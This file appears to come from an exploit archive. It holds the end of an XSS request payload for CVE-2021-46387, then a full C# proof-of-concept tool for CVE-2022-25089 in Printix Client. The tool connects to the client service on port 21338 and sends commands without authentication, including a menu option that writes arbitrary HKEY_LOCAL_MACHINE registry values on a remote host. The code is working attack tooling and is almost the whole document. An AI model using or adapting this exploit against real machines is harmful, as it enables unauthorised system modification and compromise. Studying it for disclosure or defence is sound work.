# Tested on: Ubuntu Linux [Firefox]
# CVE : CVE-2021-46387

GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1
Host: vuln.ip:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
            
# Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE)
# Date: 3/1/2022
# Exploit Author: Logan Latvala
# Vendor Homepage: https://printix.net
# Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
# Version: <= 1.3.1106.0
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
# CVE : CVE-2022-25089
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089

using Microsoft.Win32;
using Newtonsoft.Json;
using Newtonsoft.Json.Converters;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;

/**
 * ________________________________________
 * 
 * Printix Vulnerability, CVE-2022-25089
 * Part of a Printix Vulnerability series
 * Author: Logan Latvala
 * Github: https://github.com/ComparedArray/printix-CVE-2022-25089
 * ________________________________________
 * 
 */


namespace ConsoleApp1a
{

	/// <summary>
	/// Body of the registry command sent to the Printix client service; serialized
	/// with Newtonsoft.Json by <see cref="Session"/> for command 49.
	/// </summary>
	public class PersistentRegistryData
	{
		/// <summary>Operation to perform; see <see cref="PersistentRegistryCmds"/>.</summary>
		public PersistentRegistryCmds cmd;

		/// <summary>Registry path; Session rewrites the HKEY_LOCAL_MACHINE prefix to "printix".</summary>
		public string path;

		/// <summary>Set to 12 by Session; its meaning is not shown in this excerpt.</summary>
		public int VDIType;

		/// <summary>One type-tag byte followed by the encoded value (built via Session.selectDataType).</summary>
		public byte[] registryData;
	}

	/// <summary>
	/// Registry operations understood by the service. Serialized by name
	/// (StringEnumConverter), so the JSON carries e.g. "RestoreData" rather than 3.
	/// </summary>
	[JsonConverter(typeof(StringEnumConverter))]
	public enum PersistentRegistryCmds
	{
		StoreData = 1,
		DeleteSubTree,
		RestoreData
	}
	/// <summary>
	/// Interactive builder for one request to the Printix client service. The
	/// constructor prompts on the console and fills <see cref="host"/>,
	/// <see cref="data"/> and <see cref="sessionName"/> according to the command
	/// number: 2 = ping, 49 = registry edit, 100 = free-form payload; 0 exits.
	/// The registry path (command 49) shows the service accepting HKLM writes from a
	/// network peer; hardening would authenticate the caller and confine writes to a
	/// fixed product subkey.
	/// </summary>
	public class Session
	{
		public int commandNumber { get; set; }
		public string host { get; set; }
		public string data { get; set; }
		public string sessionName { get; set; }
		public Session(int commandSessionNumber = 0)
		{
			commandNumber = commandSessionNumber;
			switch (commandSessionNumber)
			{
				// Constructed with the default (0): terminate the process immediately.
				case (0):
					Environment.Exit(0x001);
					break;

				// Ping request: only the host is needed.
				case (2):
					Console.WriteLine("\n What Host Address?  (DNS Names Or IP)\n");
					Console.Write("IP: ");
					host = Console.ReadLine();
					Console.WriteLine("Host address set to: " + host);

					data = "pingData";
					sessionName = "PingerRinger";
					break;

				// Registry edit request: collect host, path, value type and value, then
				// serialize a PersistentRegistryData into `data`.
				case (49):
					Console.WriteLine("\n What Host Address?  (DNS Names Or IP)\n");
					Console.Write("IP: ");
					host = Console.ReadLine();
					Console.WriteLine("Host address set to: " + host);

					PersistentRegistryData persistentRegistryData = new PersistentRegistryData();
					persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData;
					persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType;
														 //persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName";
					Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n");
					Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n");
					Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE");
					Console.Write("Registry Node: ");
					// Only the HKEY_LOCAL_MACHINE prefix is rewritten to "printix"; how the
					// service maps that root back is not shown in this excerpt.
					persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix");
					Console.WriteLine("Full Address Set To:  " + persistentRegistryData.path);

					//persistentRegistryData.registryData = new byte[2];
					//byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String);

					Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword  3. Qword 4. Multi String  \n");
					Console.Write("Type:  ");
					// NOTE(review): int.Parse throws FormatException on non-numeric input.
					int dataF = int.Parse(Console.ReadLine());
					Console.WriteLine("Set Data to: " + dataF);

					Console.WriteLine("\n What value is your type?  \n");
					Console.Write("Value:  ");
					string dataB = Console.ReadLine();
					// NOTE(review): echoes dataF a second time; dataB looks like the intended value.
					Console.WriteLine("Set Data to: " + dataF);

					byte[] loader = null;
					List<byte> byteContainer = new List<byte>();
					// First byte of registryData is the RegistryValueKind tag (String=1,
					// DWord=4, QWord=11, MultiString=7), followed by the encoded value.
					// NOTE(review): no default case — a choice outside 1-4 leaves `loader`
					// null and the foreach below throws NullReferenceException.

					switch (dataF)
					{
						case (1):

							loader = selectDataType(dataB, RegistryValueKind.String);
							byteContainer.Add(1);
							break;
						case (2):
							loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord);
							byteContainer.Add(4);
							break;
						case (3):
							loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord);
							byteContainer.Add(11);
							break;
						case (4):
							loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString);
							byteContainer.Add(7);
							break;

					}

					// pathHolder counts the payload bytes but is never read.
					int pathHolder = 0;
					foreach (byte bit in loader)
					{
						pathHolder++;
						byteContainer.Add(bit);
					}

					persistentRegistryData.registryData = byteContainer.ToArray();
					//added stuff:

					//PersistentRegistryData data = new PersistentRegistryData();
					//data.cmd = PersistentRegistryCmds.RestoreData;
					//data.path = "";


					//data.cmd 
					Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData));
					data = JsonConvert.SerializeObject(persistentRegistryData);

					break;
				// Custom request: host, raw data and session name are all typed in verbatim.
				case (100):
					Console.WriteLine("\n What Host Address?  (DNS Names Or IP)\n");
					Console.Write("IP: ");
					host = Console.ReadLine();
					Console.WriteLine("Host address set to: " + host);

					Console.WriteLine("\n What Data Should Be Sent?\n");
					Console.Write("Data: ");
					data = Console.ReadLine();
					Console.WriteLine("Data set to: " + data);

					Console.WriteLine("\n What Session Name Should Be Used? \n");
					Console.Write("Session Name: ");
					sessionName = Console.ReadLine();
					Console.WriteLine("Session name set to: " + sessionName);
					break;
			}


		}
		/// <summary>
		/// Encode <paramref name="value"/> as the raw bytes the service expects for
		/// <paramref name="format"/>: String → UTF-8; DWord → BitConverter bytes of the
		/// int (or long when the boxed value is not an int); QWord → 8 bytes (null → 0);
		/// MultiString → each entry as a one-byte length followed by its UTF-8 bytes.
		/// </summary>
		public static byte[] selectDataType(object value, RegistryValueKind format)
		{
			// NOTE(review): every branch except MultiString replaces this array; in the
			// MultiString branch Concat() appends after these 50 zero bytes, which looks
			// unintended — confirm against what the service expects.
			byte[] array = new byte[50];

			switch (format)
			{
				case RegistryValueKind.String: //1
					array = Encoding.UTF8.GetBytes((string)value);
					break;
				case RegistryValueKind.DWord://4
					// NOTE(review): unboxing with (long)value throws InvalidCastException
					// unless the boxed value actually is a long.
					array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value));
					break;
				case RegistryValueKind.QWord://11
					if (value == null)
					{
						value = 0L;
					}
					array = BitConverter.GetBytes((long)value);
					break;
				case RegistryValueKind.MultiString://7 
					{
						if (value == null)
						{
							value = new string[1] { string.Empty };
						}
						string[] array2 = (string[])value;
						foreach (string s in array2)
						{
							// Length prefix is a single byte, so entries longer than 255 bytes are truncated in the prefix only.
							byte[] bytes = Encoding.UTF8.GetBytes(s);
							byte[] second = new byte[1] { (byte)bytes.Length };
							array = array.Concat(second).Concat(bytes).ToArray();
						}
						break;
					}
			}
			return array;
		}
	}
	// Console driver for the CVE-2022-25089 proof of concept (the banner printed in Main
	// names the CVE and version). It collects a command number, payload and session name,
	// connects to TCP port 21338 and echoes whatever the service sends back.
	// The fixed port and the literal session-name prefixes below are the stable artefacts
	// of this client; whether the session name itself goes on the wire is decided inside
	// CompCommClient, which is not visible here.
	class CVESUBMISSION
    {
		// Entry point. Never returns: any exception escaping the body is printed, the
		// program waits for Enter and restarts the menu via the FORCERESTART label.
		static void Main(string[] args)
		{
		FORCERESTART:
			try
			{

				//Edit any registry without auth: 
				//Use command 49, use the code provided on the desktop...
				//This modifies it directly, so no specific username is needed. :D

				//The command parameter, a list of commands is below.
				//Only used if none of the menu options further down overwrites it.
				int command = 43;

				//To force the user to input variables or not.
				//NOTE(review): assigned but never read anywhere in this method.
				bool forceCustomInput = false;

				//The data to send, this isn't flexible and should be used only for specific examples.
				//Try to keep above 4 characters if you're just shoving things into the command.
				string data = "{\"profileID\":1,\"result\":true}";

				//The username to use.
				//This is to fulfill the requirements whilst in development mode.
				//Static shared state; presumably read by CompCommClient when it talks to the service.
				DefaultValues.CurrentSessName = "printixMDNs7914";

				//The host to connect to. DEFAULT= "localhost"
				string host = "192.168.1.29";

			//								Configuration Above

			InvalidInputLabel:
				Console.Clear();
				Console.WriteLine("Please select the certificate you want to use with port 21338.");
				//Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now.
				Console.WriteLine("Already selected, client authentication isn't needed.");

				Console.WriteLine(" /───────────────────────────\\ ");
				Console.WriteLine("\nWhat would you like to do?");
				Console.WriteLine("\n	1. Send Ping Request");
				Console.WriteLine("	2. Send Registry Edit Request");
				Console.WriteLine("	3. Send Custom Request");
				Console.WriteLine("	4. Experimental Mode (Beta)\n");
				Console.Write("I choose option # ");

				try
				{
					// ToLower() is a no-op on a numeric string. Non-numeric input, or EOF on stdin
					// (ReadLine() returns null), throws and is handled by the catch below.
					switch (int.Parse(Console.ReadLine().ToLower()))
					{
						case (1):
							// Session(2) presumably pre-fills a ping request; its fields are copied out here.
							Session session = new Session(2);

							command = session.commandNumber;
							host = session.host;
							data = session.data;
							// System.Random is not a CSPRNG; the suffix only varies the name between runs.
							DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);



							break;
						case (2):
							// Session(49) presumably pre-fills the registry-edit request mentioned at the top of Main.
							Session sessionTwo = new Session(49);

							command = sessionTwo.commandNumber;
							host = sessionTwo.host;
							data = sessionTwo.data;
							DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);

							break;
						case (3):

							// Everything user-supplied; an int.Parse failure is caught below and restarts the menu.
							Console.WriteLine("What command number do you want to input?");
							command = int.Parse(Console.ReadLine().ToString());
							Console.WriteLine("What IP would you like to use? (Default = localhost)");
							host = Console.ReadLine();
							Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)");
							data = Console.ReadLine();

							Console.WriteLine("What session name do you want to use? ");
							DefaultValues.CurrentSessName = Console.ReadLine();
							break;
						case (4):
							Console.WriteLine("Not yet implemented.");
							break;
					}
				}
				catch (Exception e)
				{
					// NOTE(review): every failure, including EOF on stdin, jumps back to the menu,
					// so a closed stdin most likely loops forever instead of exiting.
					Console.WriteLine("Invalid Input!");
					goto InvalidInputLabel;
				}
				
				Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala");
				Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n");

				CompCommClient client = new CompCommClient();


				// Response buffer handed to client.Read(). It starts as all zeros, which is what
				// the first pass of the reader loop below sees.
				byte[] responseStorage = new byte[25555];
				int responseCMD = 0;
				// Presumably (host, port, retries, timeout in ms) - confirm against CompCommClient.Connect.
				client.Connect(host, 21338, 3, 10000);

				// One request: the numeric command plus the UTF-8 payload. Nothing in this method
				// performs an authentication step between Connect and SendMessage; whatever
				// CompCommClient does internally is not visible here.
				client.SendMessage(command, Encoding.UTF8.GetBytes(data));
				// Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it.
				// Check for output multiple times, and see if this is conclusive.



				//client.SendMessage(51, Encoding.ASCII.GetBytes(data));
				// Reader thread. The lambda captures client, responseStorage and responseCMD,
				// so the values printed at ReadException are whatever the last Read() left behind.
				new Thread(() => {
					//Thread.Sleep(4000);
					if (client.Connected())
					{
						int cam = 0;
						// Five passes of the read loop (cam 0..4); may be lifted in the future.
						while (cam < 5)
						{

							//Reads the datastream and keeps returning results.
							//Thread.Sleep(100);
							try
							{
								try
								{
									// Echoes the buffer filled by the PREVIOUS pass's Read(); on the
									// first pass it is all zeros and nothing printable comes out.
									if (responseStorage?.Any() == true)
									{
										//List<byte> byo1 =  responseStorage.ToList();
										// Replies containing "Caption" are deliberately not echoed.
										if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption"))
										{
											foreach (char cam2 in Encoding.UTF8.GetString(responseStorage))
											{
												// && binds tighter than ||: letters, digits and punctuation are
												// written; NULs, whitespace and other control chars are dropped.
												if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2))
												{
													Console.Write(cam2);
												}
											}
										}else
                                        {
											// Intentionally empty: a reply containing "Caption" is swallowed.
                                        }
									}

								}
								catch (Exception e) { Debug.WriteLine(e); }
								// Next frame from the connection; overwrites both out-variables.
								client.Read(out responseCMD, out responseStorage);

							}
							catch (Exception e)
							{
								// Any exception from Read() ends the loop early.
								goto ReadException;
							}
							Thread.Sleep(100);
							cam++;
							//Console.WriteLine(cam);
						}

					


					}
					else
					{
						Console.WriteLine("[WARNING]: Client is Disconnected!");
					}
				ReadException:
					try
					{
						// Final dump of the last command id and raw buffer, then close the connection.
						Console.WriteLine("Command Variable Response: " + responseCMD);
						Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD);
						client.disConnect();
					}
					catch (Exception e)
					{
						// The message assumes a timeout, but any exception from the block above lands here.
						Console.WriteLine("After 4.2 Seconds, there has been no response!");
						client.disConnect();
					}
				}).Start();

				// Runs right after the thread starts, so this almost certainly still prints 0.
				Console.WriteLine(responseCMD);
				// Waits for Enter; the menu then restarts via FORCERESTART below.
				Console.ReadLine();

			}

			catch (Exception e)
			{
				// Catch-all for connect/send failures: print, wait for Enter, restart from the top.
				Console.WriteLine(e);
				Console.ReadLine();

				//Environment.Exit(e.HResult);
			}

			goto FORCERESTART;
		}
	}
}